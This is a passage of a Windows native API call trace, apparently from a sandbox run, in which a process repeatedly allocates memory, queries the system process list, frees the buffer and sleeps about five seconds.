BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.176] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.186] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.340] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.355] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.454] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.454] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.456] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.456] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.513] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.519] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.628] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.633] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.644] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.668] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.895] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.954] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.967] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.968] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0145.985] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0145.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0145.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0145.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0145.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0145.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0145.993] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.003] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.024] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0146.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0146.036] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0146.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0146.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0146.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0146.039] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0146.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, 